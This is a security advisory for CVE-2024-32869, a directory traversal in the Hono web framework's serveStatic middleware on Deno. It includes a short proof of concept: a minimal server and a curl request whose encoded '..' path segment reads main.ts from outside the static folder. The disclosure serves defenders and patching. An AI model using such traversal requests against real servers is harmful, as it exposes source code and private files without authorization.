Hono vulnerable to Restricted Directory Traversal in serveStatic with deno

GHSA-3mpf-rcc7-5347 · CVE-2024-32869

Published Apr 23, 2024 · Modified Mar 23, 2026

Description

Summary

When using serveStatic with deno, it is possible to directory traverse where main.ts is located.

My environment is configured as per this tutorial
https://hono.dev/getting-started/deno

PoC

$ tree
.
├── deno.json
├── deno.lock
├── main.ts
├── README.md
└── static
    └── a.txt

source

import { Hono } from 'https://deno.land/x/hono@v4.2.6/mod.ts'
import { serveStatic } from 'https://deno.land/x/hono@v4.2.6/middleware.ts'

const app = new Hono()
app.use('/static/*', serveStatic({ root: './' }))

Deno.serve(app.fetch)

request

curl localhost:8000/static/%2e%2e/main.ts

response is content of main.ts

Impact

Unexpected files are retrieved.

References

WEB https://github.com/honojs/hono/security/advisories/GHSA-3mpf-rcc7-5347
ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2024-32869
WEB https://github.com/honojs/hono/commit/92e65fbb6e5e7372650e7690dbd84938432d9e65
PACKAGE https://github.com/honojs/hono

Ready to move

Start Securing

Start for Free Get Demo

Free, no credit card | First findings in minutes